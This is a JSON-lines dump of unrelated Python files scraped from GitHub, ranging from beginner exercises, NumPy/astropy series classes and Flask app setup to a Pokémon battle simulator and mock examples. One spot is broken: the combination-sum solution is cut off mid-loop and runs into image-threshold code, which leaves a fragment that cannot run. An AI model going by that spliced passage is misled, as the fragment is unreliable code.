infomap_partition(G, node_type_dict, subnet)\n [file.write(str(k) + \",\" + subnet + \"_\" + str(v) + \"\\n\") for k,v in im_outputs[subnet][1].items()]\n file.close() \n \n print(\"\\nFile saved: \" + outdir + network_name + \"_infomap_partition.csv\\n\") \n \n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n","repo_name":"CAnBioNet/TkNA","sub_path":"analysis/infomap_assignment.py","file_name":"infomap_assignment.py","file_ext":"py","file_size_in_byte":7244,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"42431838105","text":"#Una juguetería tiene mucho éxito en dos de sus productos: payasos y muñecas. \n#Suele hacer venta por correo y la empresa de logística les cobra por peso de\n#cada paquete así que deben calcular el peso de los payasos y muñecas que saldrán\n#en cada paquete a demanda. Cada payaso pesa 112 g y cada muñeca 75 g. \n#Escribir un programa que lea el número de payasos y muñecas vendidos en el último \n#pedido y calcule el peso total del paquete que será enviado.\n\n#gramos\npesopay=112\npesomuñeca=75\nprint(\"\\nLogistica\\n\")\npay=int(input(\"Ingrese el numero de payasos vendidos\"))\nmuñecas=int(input(\"Ingrese el numero de muñecas vendidas\"))\npeso=(pay*pesopay)+(muñecas*pesomuñeca)\nif peso>=1000:\n kg=peso/1000\n #g=peso%1000\n print(f\"Usted va a enviar {pay} payasos y {muñecas} muñecas.\\nEl peso total del pedido es de: {kg} kg.\")\nelse:\n print(f\"Usted va a enviar {pay} payasos y {muñecas} muñecas.\\nEl peso total del pedido es de: {peso} g.\")\n \n\n\n","repo_name":"MauricioMunguia10/EjerciciosPython","sub_path":"TiposdeDatos/ejercicio10.py","file_name":"ejercicio10.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5209049010","text":"class Solution:\n \"\"\"\n @param: num: Given the candidate numbers\n @param: target: Given the target number\n @return: All the combinations that sum to target\n \"\"\"\n def combinationSum2(self, num, target):\n # write your code here\n num.sort()\n self.res=[]\n self.dfs(num,[],target,0)\n return self.res\n def dfs(self,num,curr,target,start):\n if target==0:\n self.res.append(curr)\n if target<=0:\n return\n n=len(num)\n i=start\n while i self.level*255] = 255\n np_img[np_img <= self.level*255] = 0\n\n img = Image.fromarray(np_img, 'L')\n\n return img\n\nclass WeightedBCELoss(torch.nn.BCELoss):\n def __init__(self, class_weights=None): # does not support weight, size_average, reduce, reduction\n super().__init__(reduction='none')\n if class_weights is None:\n class_weights = torch.ones(2)\n self.class_weights = torch.as_tensor(class_weights)\n\n def forward(self, input, target):\n raw_loss = super().forward(input, target)\n class_weights = self.class_weights.to(input.device)\n weight_matrix = class_weights[0]*(1-target) + class_weights[1]*target\n loss = weight_matrix * raw_loss\n loss = loss.mean() # reduction='elementwise_mean'\n return loss\n\n\ndef compute_class_weights(imgs):\n mask_transform = transforms.Compose([\n GrayscaleAndThreshold(),\n transforms.ToTensor()\n ])\n\n road_pxs = 0\n bg_pxs = 0\n for img in imgs:\n img = Image.fromarray(np.uint8(img*255))\n mask_tr = torch.squeeze(mask_transform(img)).numpy().astype(int)\n road_pxs += mask_tr.sum()\n bg_pxs += (1 - mask_tr).sum()\n\n bg_px_weight = (road_pxs + bg_pxs) / (2 * bg_pxs) # \"class 0\"\n road_px_weight = (road_pxs + bg_pxs) / (2 * road_pxs) # \"class 1\"\n\n return bg_px_weight, road_px_weight\n","repo_name":"Minauras/road-segmentation","sub_path":"ResNet/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"19528371020","text":"__version__ = 'Testing 0.0.1'\n\nimport numpy\nimport warnings\n\nfrom astropy.units import (Unit, Quantity)\n\nfrom constantQ.utilityaccess import if_not_none\nfrom constantQ.index import Index\nfrom constantQ.segments import Segment\n\n################### Array ###################\nclass Array(Quantity):\n \"\"\"Array holding data with a unit, and other metadata\n Array([ 1., 2., 3., 4., 5.]\n unit: Unit(\"m / s\"),\n name: 'my data',\n epoch: None,\n channel: None)\n https://github.com/gwpy/gwpy/blob/v2.0.4/gwpy/types/array.py\n \"\"\"\n\n _metadata_slots = ('name', 'epoch', 'channel')\n\n def __new__(cls, value, unit=None, # Quantity attrs\n name=None, epoch=None, channel=None, # new attrs\n dtype=None, copy=True, subok=True, # ndarray attrs\n order=None, ndmin=0):\n \"\"\"Create a new `Array`\n \"\"\"\n # pick dtype from input array\n if dtype is None and isinstance(value, numpy.ndarray):\n dtype = value.dtype\n\n # create new array\n new = super().__new__(cls, value, unit=unit, dtype=dtype, copy=False,\n order=order, subok=subok, ndmin=ndmin)\n\n # explicitly copy here to get ownership of the data,\n # see (astropy/astropy#7244)\n if copy:\n new = new.copy()\n\n # set new attributes\n if name is not None:\n new.name = name\n if epoch is not None:\n new.epoch = epoch\n if channel is not None:\n new.channel = channel\n\n return new\n\n def __array_finalize__(self, obj):\n # format a new instance of this class starting from `obj`\n if obj is None:\n return\n\n # call Quantity.__array_finalize__ to handle the units\n super().__array_finalize__(obj)\n\n # then update metadata\n if isinstance(obj, Quantity):\n self.__metadata_finalize__(obj, force=False)\n\n def __metadata_finalize__(self, obj, force=False):\n # apply metadata from obj to self if creating a new object\n for attr in self._metadata_slots:\n _attr = '_%s' % attr # use private attribute (not property)\n # if attribute is unset, default it to None, then update\n # from obj if desired\n try:\n getattr(self, _attr)\n except AttributeError:\n update = True\n else:\n update = force\n if update:\n try:\n val = getattr(obj, _attr)\n except AttributeError:\n continue\n else:\n if isinstance(val, Quantity): # copy Quantities\n setattr(self, _attr, type(val)(val))\n else:\n setattr(self, _attr, val)\n\n def _repr_helper(self, print_):\n if print_ is repr:\n opstr = '='\n else:\n opstr = ': '\n\n # get prefix and suffix\n prefix = '{}('.format(type(self).__name__)\n suffix = ')'\n if print_ is repr:\n prefix = '<{}'.format(prefix)\n suffix += '>'\n\n indent = ' ' * len(prefix)\n\n # format value\n arrstr = numpy.array2string(self.view(numpy.ndarray), separator=', ',\n prefix=prefix)\n\n # format unit\n metadata = [('unit', print_(self.unit) or 'dimensionless')]\n\n # format other metadata\n try:\n attrs = self._print_slots\n except AttributeError:\n attrs = self._metadata_slots\n for key in attrs:\n try:\n val = getattr(self, key)\n except (AttributeError, KeyError):\n val = None\n thisindent = indent + ' ' * (len(key) + len(opstr))\n metadata.append((\n key.lstrip('_'),\n print_(val).replace('\\n', '\\n{}'.format(thisindent)),\n ))\n metadata = (',\\n{}'.format(indent)).join(\n '{0}{1}{2}'.format(key, opstr, value) for key, value in metadata)\n\n return \"{0}{1}\\n{2}{3}{4}\".format(\n prefix, arrstr, indent, metadata, suffix)\n\n def __repr__(self):\n \"\"\"Return a representation of this object\n This just represents each of the metadata objects appropriately\n after the core data array\n \"\"\"\n return self._repr_helper(repr)\n\n def __str__(self):\n \"\"\"Return a printable string format representation of this object\n This just prints each of the metadata objects appropriately\n after the core data array\n \"\"\"\n return self._repr_helper(str)\n\n # name \n @property\n def name(self):\n \"\"\"Name for this data set\n \"\"\"\n try:\n return self._name\n except AttributeError:\n self._name = None\n return self._name\n \n @name.setter\n def name(self, val):\n self._name = if_not_none(str, val) \n\n @name.deleter\n def name(self):\n try:\n del self._name\n except AttributeError:\n pass\n\n def abs(self, axis=None, **kwargs):\n return self._wrap_function(numpy.abs, axis, **kwargs)\n abs.__doc__ = numpy.abs.__doc__\n\n def median(self, axis=None, **kwargs):\n return self._wrap_function(numpy.median, axis, **kwargs)\n median.__doc__ = numpy.median.__doc__\n\n################### Series ###################\nclass Series(Array):\n \"\"\"A one-dimensional data series\n Series([ 1., 2., 3., 2., 4., 3.]\n unit: Unit(\"nm\"),\n name: None,\n epoch: None,\n channel: None,\n x0: 0.0 W,\n dx: 2.0 W,\n xindex: [ 0. 2. 4. 6. 8. 10.] W)\n https://github.com/gwpy/gwpy/blob/v2.0.4/gwpy/types/series.py\n \"\"\"\n _metadata_slots = Array._metadata_slots + ('x0', 'dx', 'xindex')\n _default_xunit = Unit('')\n _ndim = 1\n\n def __new__(cls, value, unit=None, x0=None, dx=None, xindex=None,\n xunit=None, **kwargs):\n # check input data dimensions are OK\n shape = numpy.shape(value)\n if len(shape) != cls._ndim:\n raise ValueError(\"Cannot generate %s with %d-dimensional data\"\n % (cls.__name__, len(shape)))\n\n # create new object\n new = super().__new__(cls, value, unit=unit, **kwargs)\n\n # set x-axis metadata from xindex\n if xindex is not None:\n # warn about duplicate settings\n if dx is not None:\n warnings.warn(\"xindex was given to %s(), dx will be ignored\"\n % cls.__name__)\n if x0 is not None:\n warnings.warn(\"xindex was given to %s(), x0 will be ignored\"\n % cls.__name__)\n # get unit\n if xunit is None and isinstance(xindex, Quantity):\n xunit = xindex.unit\n elif xunit is None:\n xunit = cls._default_xunit\n new.xindex = Quantity(xindex, unit=xunit)\n # or from x0 and dx\n else:\n if xunit is None and isinstance(dx, Quantity):\n xunit = dx.unit\n elif xunit is None and isinstance(x0, Quantity):\n xunit = x0.unit\n elif xunit is None:\n xunit = cls._default_xunit\n if dx is not None:\n new.dx = Quantity(dx, xunit)\n if x0 is not None:\n new.x0 = Quantity(x0, xunit)\n return new\n\n # -- series properties ----------------------\n\n def _update_index(self, axis, key, value):\n \"\"\"Update the current axis index based on a given key or value\n This is an internal method designed to set the origin or step for\n an index, whilst updating existing Index arrays as appropriate\n Examples\n --------\n >>> self._update_index(\"x0\", 0)\n >>> self._update_index(\"dx\", 0)\n To actually set an index array, use `_set_index`\n \"\"\"\n # delete current value if given None\n if value is None:\n return delattr(self, key)\n\n _key = \"_{}\".format(key)\n index = \"{[0]}index\".format(axis)\n unit = \"{[0]}unit\".format(axis)\n\n # convert float to Quantity\n if not isinstance(value, Quantity):\n try:\n value = Quantity(value, getattr(self, unit))\n except TypeError:\n value = Quantity(float(value), getattr(self, unit))\n\n # if value is changing, delete current index\n try:\n curr = getattr(self, _key)\n except AttributeError:\n delattr(self, index)\n else:\n if (\n value is None\n or getattr(self, key) is None\n or not value.unit.is_equivalent(curr.unit)\n or value != curr\n ):\n delattr(self, index)\n\n # set new value\n setattr(self, _key, value)\n return value\n\n def _set_index(self, key, index):\n \"\"\"Set a new index array for this series\n \"\"\"\n axis = key[0]\n origin = \"{}0\".format(axis)\n delta = \"d{}\".format(axis)\n if index is None:\n return delattr(self, key)\n if not isinstance(index, Index):\n try:\n unit = index.unit\n except AttributeError:\n unit = getattr(self, \"_default_{}unit\".format(axis))\n index = Index(index, unit=unit, copy=False)\n setattr(self, origin, index[0])\n if index.regular:\n setattr(self, delta, index[1] - index[0])\n else:\n delattr(self, delta)\n setattr(self, \"_{}\".format(key), index)\n\n def _index_span(self, axis):\n\n axisidx = (\"x\", \"y\", \"z\").index(axis)\n unit = getattr(self, \"{}unit\".format(axis))\n try:\n delta = getattr(self, \"d{}\".format(axis)).to(unit).value\n except AttributeError: # irregular xindex\n index = getattr(self, \"{}index\".format(axis))\n try:\n delta = index.value[-1] - index.value[-2]\n except IndexError:\n raise ValueError(\"Cannot determine x-axis stride (dx)\"\n \"from a single data point\")\n return Segment(index.value[0], index.value[-1] + delta)\n else:\n origin = getattr(self, \"{}0\".format(axis)).to(unit).value\n return Segment(origin, origin + self.shape[axisidx] * delta)\n\n # x0\n @property\n def x0(self):\n \"\"\"X-axis coordinate of the first data point\n :type: `~astropy.units.Quantity` scalar\n \"\"\"\n try:\n return self._x0\n except AttributeError:\n self._x0 = Quantity(0, self.xunit)\n return self._x0\n\n @x0.setter\n def x0(self, value):\n self._update_index(\"x\", \"x0\", value)\n\n @x0.deleter\n def x0(self):\n try:\n del self._x0\n except AttributeError:\n pass\n\n # dx\n @property\n def dx(self):\n \"\"\"X-axis sample separation\n :type: `~astropy.units.Quantity` scalar\n \"\"\"\n try:\n return self._dx\n except AttributeError:\n try:\n self._xindex\n except AttributeError:\n self._dx = Quantity(1, self.xunit)\n else:\n if not self.xindex.regular:\n raise AttributeError(\"This series has an irregular x-axis \"\n \"index, so 'dx' is not well defined\")\n self._dx = self.xindex[1] - self.xindex[0]\n return self._dx\n\n @dx.setter\n def dx(self, value):\n self._update_index(\"x\", \"dx\", value)\n\n @dx.deleter\n def dx(self):\n try:\n del self._dx\n except AttributeError:\n pass\n\n # xindex\n @property\n def xindex(self):\n \"\"\"Positions of the data on the x-axis\n :type: `~astropy.units.Quantity` array\n \"\"\"\n try:\n return self._xindex\n except AttributeError:\n self._xindex = Index.define(self.x0, self.dx, self.shape[0])\n return self._xindex\n\n @xindex.setter\n def xindex(self, index):\n self._set_index(\"xindex\", index)\n\n @xindex.deleter\n def xindex(self):\n try:\n del self._xindex\n except AttributeError:\n pass\n\n # xunit\n @property\n def xunit(self):\n \"\"\"Unit of x-axis index\n :type: `~astropy.units.Unit`\n \"\"\"\n try:\n return self._dx.unit\n except AttributeError:\n try:\n return self._x0.unit\n except AttributeError:\n return self._default_xunit\n\n @xunit.setter\n def xunit(self, unit):\n unit = Unit(unit)\n try: # set the index, if present\n self.xindex = self._xindex.to(unit)\n except AttributeError: # or just set the start and step\n self.dx = self.dx.to(unit)\n self.x0 = self.x0.to(unit)\n\n @property\n def xspan(self):\n \"\"\"X-axis [low, high) segment encompassed by these data\n :type: `~gwpy.segments.Segment`\n \"\"\"\n return self._index_span(\"x\")\n\n\n################### Array2D ###################\nclass Array2D(Series):\n \"\"\"A two-dimensional array with metadata\n \"\"\"\n _metadata_slots = Series._metadata_slots + ('y0', 'dy', 'yindex')\n _default_xunit = Unit('')\n _default_yunit = Unit('')\n _rowclass = Series\n _columnclass = Series\n _ndim = 2\n\n def __new__(cls, data, unit=None,\n x0=None, dx=None, xindex=None, xunit=None,\n y0=None, dy=None, yindex=None, yunit=None, **kwargs):\n \"\"\"Define a new `Array2D`\n \"\"\"\n\n # create new object\n new = super().__new__(cls, data, unit=unit, xindex=xindex,\n xunit=xunit, x0=x0, dx=dx, **kwargs)\n\n # set y-axis metadata from yindex\n if yindex is not None:\n # warn about duplicate settings\n if dy is not None:\n warnings.warn(\"yindex was given to %s(), dy will be ignored\"\n % cls.__name__)\n if y0 is not None:\n warnings.warn(\"yindex was given to %s(), y0 will be ignored\"\n % cls.__name__)\n # get unit\n if yunit is None and isinstance(yindex, Quantity):\n yunit = yindex.unit\n elif yunit is None:\n yunit = cls._default_yunit\n new.yindex = Quantity(yindex, unit=yunit)\n # or from y0 and dy\n else:\n if yunit is None and isinstance(dy, Quantity):\n yunit = dy.unit\n elif yunit is None and isinstance(y0, Quantity):\n yunit = y0.unit\n elif yunit is None:\n yunit = cls._default_yunit\n if dy is not None:\n new.dy = Quantity(dy, yunit)\n if y0 is not None:\n new.y0 = Quantity(y0, yunit)\n\n return new\n\n # -- Array2d properties ---------------------\n\n # y0\n @property\n def y0(self):\n \"\"\"Y-axis coordinate of the first data point\n :type: `~astropy.units.Quantity` scalar\n \"\"\"\n try:\n return self._y0\n except AttributeError:\n self._y0 = Quantity(0, self.yunit)\n return self._y0\n\n @y0.setter\n def y0(self, value):\n self._update_index(\"y\", \"y0\", value)\n\n @y0.deleter\n def y0(self):\n try:\n del self._y0\n except AttributeError:\n pass\n\n # dy\n @property\n def dy(self):\n \"\"\"Y-axis sample separation\n :type: `~astropy.units.Quantity` scalar\n \"\"\"\n try:\n return self._dy\n except AttributeError:\n try:\n self._yindex\n except AttributeError:\n self._dy = Quantity(1, self.yunit)\n else:\n if not self.yindex.regular:\n raise AttributeError(\n \"This series has an irregular y-axis \"\n \"index, so 'dy' is not well defined\")\n self._dy = self.yindex[1] - self.yindex[0]\n return self._dy\n\n @dy.setter\n def dy(self, value):\n self._update_index(\"y\", \"dy\", value)\n\n @dy.deleter\n def dy(self):\n try:\n del self._dy\n except AttributeError:\n pass\n\n @property\n def yunit(self):\n \"\"\"Unit of Y-axis index\n :type: `~astropy.units.Unit`\n \"\"\"\n try:\n return self._dy.unit\n except AttributeError:\n try:\n return self._y0.unit\n except AttributeError:\n return self._default_yunit\n\n # yindex\n @property\n def yindex(self):\n \"\"\"Positions of the data on the y-axis\n :type: `~astropy.units.Quantity` array\n \"\"\"\n try:\n return self._yindex\n except AttributeError:\n self._yindex = Index.define(self.y0, self.dy, self.shape[1])\n return self._yindex\n\n @yindex.setter\n def yindex(self, index):\n self._set_index(\"yindex\", index)\n\n @yindex.deleter\n def yindex(self):\n try:\n del self._yindex\n except AttributeError:\n pass\n\n @property\n def yspan(self):\n \"\"\"Y-axis [low, high) segment encompassed by these data\n :type: `~gwpy.segments.Segment`\n \"\"\"\n return self._index_span(\"y\")\n\n @property\n def T(self):\n trans = self.value.T.view(type(self))\n trans.__array_finalize__(self)\n if hasattr(self, '_xindex'):\n trans.yindex = self.xindex.view()\n else:\n trans.y0 = self.x0\n trans.dy = self.dx\n if hasattr(self, '_yindex'):\n trans.xindex = self.yindex.view()\n else:\n trans.x0 = self.y0\n trans.dx = self.dy\n return trans","repo_name":"xli2522/Constant-Q","sub_path":"constantQ/series.py","file_name":"series.py","file_ext":"py","file_size_in_byte":18144,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"17295404709","text":"from flask import Flask, render_template\nfrom flask_apscheduler import APScheduler\nfrom flask_httpauth import HTTPBasicAuth\nfrom flask_login import LoginManager\nfrom flask_mail import Mail\nfrom flask_sqlalchemy import SQLAlchemy\nfrom hvac import Client as VaultClient\nfrom importlib import import_module\nfrom logging import basicConfig, DEBUG, info, StreamHandler\nfrom logging.handlers import RotatingFileHandler\nfrom eNMS.contrib.themes import apply_themes\nfrom os import environ\n\nauth = HTTPBasicAuth()\ndb = SQLAlchemy(\n session_options={\n 'expire_on_commit': False,\n 'autoflush': False\n }\n)\nlogin_manager = LoginManager()\nmail = Mail()\nscheduler = APScheduler()\n\n# Vault\nuse_vault = int(environ.get('USE_VAULT', False))\nvault_client = VaultClient()\n\nfrom eNMS.base.default import (\n create_default_services,\n create_default_parameters,\n create_default_pools,\n create_default_users,\n create_default_examples\n)\nfrom eNMS.base.helpers import fetch\nfrom eNMS.base.rest import configure_rest_api\n\n\ndef register_extensions(app):\n db.init_app(app)\n login_manager.init_app(app)\n mail.init_app(app)\n if not scheduler.running:\n scheduler.init_app(app)\n scheduler.start()\n\n\ndef register_blueprints(app):\n blueprints = (\n 'admin',\n 'automation',\n 'base',\n 'logs',\n 'objects',\n 'scheduling',\n 'views',\n 'provisioning'\n )\n for blueprint in blueprints:\n module = import_module(f'eNMS.{blueprint}')\n app.register_blueprint(module.bp)\n\n\ndef configure_login_manager(app):\n @login_manager.user_loader\n def user_loader(id):\n return fetch('User', id=id)\n\n @login_manager.request_loader\n def request_loader(request):\n return fetch('User', name=request.form.get('name'))\n\n\ndef configure_vault_client(app):\n vault_client.url = app.config['VAULT_ADDR']\n vault_client.token = app.config['VAULT_TOKEN']\n if vault_client.sys.is_sealed() and app.config['UNSEAL_VAULT']:\n keys = [app.config[f'UNSEAL_VAULT_KEY{i}'] for i in range(1, 6)]\n vault_client.unseal_multi(filter(None, keys))\n\n\ndef configure_database(app):\n @app.teardown_request\n def shutdown_session(exception=None):\n db.session.remove()\n\n @app.before_first_request\n def create_default():\n db.create_all()\n create_default_users()\n create_default_parameters()\n create_default_services()\n if app.config['CREATE_EXAMPLES']:\n create_default_examples(app)\n create_default_pools()\n\n\ndef configure_errors(app):\n @login_manager.unauthorized_handler\n def unauthorized_handler():\n return render_template('errors/page_403.html'), 403\n\n @app.errorhandler(403)\n def authorization_required(error):\n return render_template('errors/page_403.html'), 403\n\n @app.errorhandler(404)\n def not_found_error(error):\n return render_template('errors/page_404.html'), 404\n\n\ndef configure_logs(app):\n basicConfig(\n level=DEBUG,\n format='%(asctime)s %(levelname)-8s %(message)s',\n datefmt='%m-%d-%Y %H:%M:%S',\n handlers=[\n RotatingFileHandler(\n app.path / 'logs' / 'enms.log',\n maxBytes=20000000,\n backupCount=10\n ),\n StreamHandler()\n ]\n )\n\n\ndef create_app(path, config):\n app = Flask(__name__, static_folder='base/static')\n app.config.from_object(config)\n app.production = not app.config['DEBUG']\n app.path = path\n register_extensions(app)\n register_blueprints(app)\n configure_login_manager(app)\n configure_database(app)\n configure_rest_api(app)\n configure_logs(app)\n configure_errors(app)\n apply_themes(app)\n if use_vault:\n configure_vault_client(app)\n info('eNMS starting')\n return app\n","repo_name":"mwallraf/eNMS","sub_path":"eNMS/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"28774481972","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pwlf\n\nx = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15], dtype=float)\ny = np.array([0, 12.05, 0, 12.66, 40.0, \n 0, 0, 0, 0, 5.1,\n 0, 0, 3.51, 0, 0])\n\nmy_pwlf = pwlf.PiecewiseLinFit(x, y)\nbreaks = my_pwlf.fit(13)\nprint(breaks)\n\nx_hat = np.linspace(x.min(), x.max(), 100)\ny_hat = my_pwlf.predict(x_hat)\n\nplt.figure()\nplt.plot(x, y, 'o')\nplt.plot(x_hat, y_hat, '-')\nplt.show()\n","repo_name":"Cuda-Chen/segmented-regression-python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20453262955","text":"from random import randrange\r\n# 252 Atk Jolly Excadrill vs 252HP 88Def Careful(+SpD-SpA) Mandibuzz\r\n\r\n#Can Mandibuzz switch in Excadrill(no Swords Dance, no Rock Slide) with more than half HP left?\r\n#Excadrill always uses Iron Head\r\n#Mandibuzz switch in at first turn\r\n\r\n#Result:\r\n#try 100000, Mandibuzz wins 41364\r\n#Mandibuzz can stall Excadrill with more than half HP by the chance of about 41%\r\n\r\nHead = [118, 120, 121, 123, 124, 126, 127, 129, 130, 132, 133, 135, 136, 138, 139, 141]\r\nHeadCT = [178, 181, 183, 186, 187, 189, 192, 193, 196, 198, 199, 202, 204, 207, 208, 211]\r\nFoul=[240, 243, 246, 249, 252, 255, 256, 259, 262, 265, 268, 271, 274, 277, 280, 283]\r\nFoulCT=[360, 364, 369, 373, 376, 381, 385, 390, 394, 399, 402, 406, 411, 415, 420, 424]\r\n\r\n#ExcaHP=361,MandHP=424\r\n\r\n\r\n############### Assumptions: Before Head pp goes to 0 \r\n\r\ndef MandStrategy(MandHP):\r\n if MandHP<=424/2+130:\r\n return 1#Roost if HP<=50% after this attack\r\n else:\r\n return 2#Foul Play if HP\r\n\r\n#f=open(\"Exca_vs_Mand.csv\",'w')\r\nMandWin = 0\r\nfor i in range(10):#Game loop\r\n #print('Round %d'%(i+1))\r\n ExcaHP,MandHP=361,424\r\n #Take a hit when switch in\r\n roll=randrange(0, 16)\r\n if randrange(1, 25) != 1:\r\n dam=Head[roll]\r\n else:\r\n dam=HeadCT[roll]\r\n MandHP = MandHP - dam\r\n #print('Excadrill used Iron Head!\\nMandibuzz HP %d to %d, loses %.2f%%\\n'%(MandHP+dam,MandHP,100*dam/424))\r\n for t in range(24):#Turn loop. Iron Head PP=24\r\n #print('Turn %d'%(t+1))\r\n MandStrgy=MandStrategy(MandHP)\r\n roll=randrange(0, 16)\r\n if randrange(1, 25) != 1:\r\n dam=Head[roll]\r\n else:\r\n dam=HeadCT[roll]\r\n MandHP = MandHP - dam\r\n #print('Excadrill used Iron Head!\\nMandibuzz HP %d to %d, loses %.2f%%\\n'%(MandHP+dam,MandHP,100*dam/424))\r\n if MandHP<1:\r\n #print('Mandibuzz Fainted! Excadrill HP %d\\n'%ExcaHP)\r\n break\r\n if randrange(0,10)<3:\r\n #print('Mandibuzz Flinched!\\n')\r\n continue\r\n else:\r\n if MandStrgy == 1:\r\n rec=min(MandHP + 212, 424)-MandHP\r\n MandHP = MandHP+rec\r\n #print('Mandibuzz used Roost! HP %d to %d, gains %.2f%%\\n'%(MandHP-rec,MandHP,100*rec/424))\r\n else: \r\n roll=randrange(0, 16)\r\n if randrange(1, 25) != 1:\r\n dam=Foul[roll]\r\n else:\r\n dam=FoulCT[roll]\r\n ExcaHP = ExcaHP-dam\r\n #print('Mandibuzz used Foul Play!\\nExcadrill HP %d to %d, loses %.2f%%\\n'%(ExcaHP+dam,ExcaHP,100*dam/361))\r\n if ExcaHP<1:\r\n #print('Excadrill Fainted! Mandibuzz HP %d\\n'%MandHP)\r\n MandWin=MandWin+1\r\n break\r\n continue\r\n #print('Turn 24 over')\r\n MandWin=MandWin+1\r\n \r\n #f.write(str(MandWin)+'\\n')\r\nprint(MandWin)\r\n\r\n","repo_name":"wlsdx/Simple-PM-Simulator","sub_path":"Excadrill_Mandibuzz.py","file_name":"Excadrill_Mandibuzz.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8662971347","text":"# Python Test Mock\n# unittest.mock � mock object library\n# unittest.mock is a library for testing in Python.\n# It allows you to replace parts of your system under test with mock objects and make assertions about how they have been used.\n# unittest.mock provides a core Mock class removing the need to create a host of stubs throughout your test suite.\n# After performing an action, you can make assertions about which methods / attributes were used and arguments they were called with.\n# You can also specify return values and set needed attributes in the normal way.\n# \n# Additionally, mock provides a patch() decorator that handles patching module and class level attributes within the scope of a test, along with sentinel\n# for creating unique objects.\n# \n# Mock is very easy to use and is designed for use with unittest. Mock is based on the �action -> assertion� pattern instead of �record -> replay� used by\n# many mocking frameworks.\n#\n\n#\n# Mocking imports with patch.dict\n# One situation where mocking can be hard is where you have a local import inside a function.\n# These are harder to mock because they aren�t using an object from the module namespace that we can patch out.\n# you can use patch.dict() to temporarily put a mock in place in sys.modules.\n#\n# Any imports whilst this patch is active will fetch the mock.\n# When the patch is complete (the decorated function exits, the with statement body is complete or patcher.stop() is called) then whatever was there\n# previously will be restored safely.\n#\n\n# \n# Here�s an example that mocks out the �fooble� module.\n# \n\nmock = Mock()\n\nwith patch.dict('sys.modules', {'fooble': mock}):\n import fooble\n\n fooble.blob()\n\n# OUTPUT: ''\n\nassert 'fooble' not in sys.modules\n\nmock.blob.assert_called_once_with()\n\n# \n# As you can see the import fooble succeeds, but on exit there is no �fooble� left in sys.modules.\n# \n# This also works for the from module import name form:\n# \n\nmock = Mock()\n\nwith patch.dict('sys.modules', {'fooble': mock}):\n from fooble import blob\n\n blob.blip()\n\n# OUTPUT: ''\n\nmock.blob.blip.assert_called_once_with()\n\n# \n# With slightly more work you can also mock package imports:\n# \n\nmock = Mock()\nmodules = {'package': mock, 'package.module': mock.module}\n\nwith patch.dict('sys.modules', modules):\n from package.module import fooble\n\n fooble()\n\n# OUTPUT: ''\n\nmock.module.fooble.assert_called_once_with()\n","repo_name":"syurskyi/Python_Topics","sub_path":"115_testing/examples/Github/_Level_1/Python_Unittest_Suite-master/Python_Test_Mock_Imports_With_Patch_Dict( ).py","file_name":"Python_Test_Mock_Imports_With_Patch_Dict( ).py","file_ext":"py","file_size_in_byte":2557,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"1528749722","text":"# Step 1: Split the input and check if they satisfy all rules\r\n# Step 2: Arrange the input to be displayed into viewer screen. There will be 3 or 4 lines. Note where the operand should be put, as the width of one set depends on 2 + maximum length of the two input numbers\r\n# Step 3: Calculate optionally and display the answers too. Use join with empty strings of 4 white spaces to make it align with the above lines.\r\n\r\ndef arithmetic_arranger(problems, show_Answers=False):\r\n\r\n # Step 1\r\n #Check for number of problems\r\n if len(problems) > 5:\r\n return \"Error: Too many problems.\"\r\n\r\n #Check for valid operators: only '+' and '-' are accepted\r\n #Split the inputs, they are first_number, operator, and second_number\r\n #Arrange them to prepare for display. Use a list.\r\n arranged_problems = []\r\n for problem in problems: \r\n firstNum, operator, secondNum = problem.split()\r\n \r\n if operator not in ('+', '-'):\r\n return \"Error: Operator must be '+' or '-'.\"\r\n\r\n if not firstNum.isdigit() or not secondNum.isdigit():\r\n return \"Error: Numbers must only contain digits.\"\r\n\r\n if len(firstNum) > 4 or len(secondNum) > 4:\r\n return \"Error: Numbers cannot be more than four digits.\"\r\n\r\n #If the input reaches here, it means it is a valid input and we will append them into our list, taking note of the triplets tuple data that we are dealing with.\r\n arranged_problems.append((firstNum, operator, secondNum)) #3-Tuple\r\n\r\n # Step 2: Arrange the problems\r\n firstLine = []\r\n secondLine = []\r\n dashLine = []\r\n answerLine = []\r\n\r\n #This is arranging per individual problem\r\n for firstNum, operator, secondNum in arranged_problems:\r\n width = max(len(firstNum), len(secondNum)) + 2 #As according to rule\r\n firstLine.append(firstNum.rjust(width)) #White space \r\n secondLine.append(operator + secondNum.rjust(width - 1, ' ')) #Fillchar = ' ' to fill in with whitespace between operand and second number\r\n dashLine.append('-' * width) #Number of - is according to problem length\r\n #Optional calculation for answer\r\n if show_Answers:\r\n answer = str(eval(firstNum + operator + secondNum)) #Directly parse and calculate result, make it back to a String afterwards.\r\n answerLine.append(answer.rjust(width))\r\n\r\n\r\n # Step 3: Display answers optionally\r\n if show_Answers:\r\n return ' '.join(firstLine) + '\\n' + ' '.join(secondLine) + '\\n' + ' '.join(dashLine) + '\\n' + ' '.join(answerLine)\r\n else:\r\n return ' '.join(firstLine) + '\\n' + ' '.join(secondLine) + '\\n' + ' '.join(dashLine)\r\n 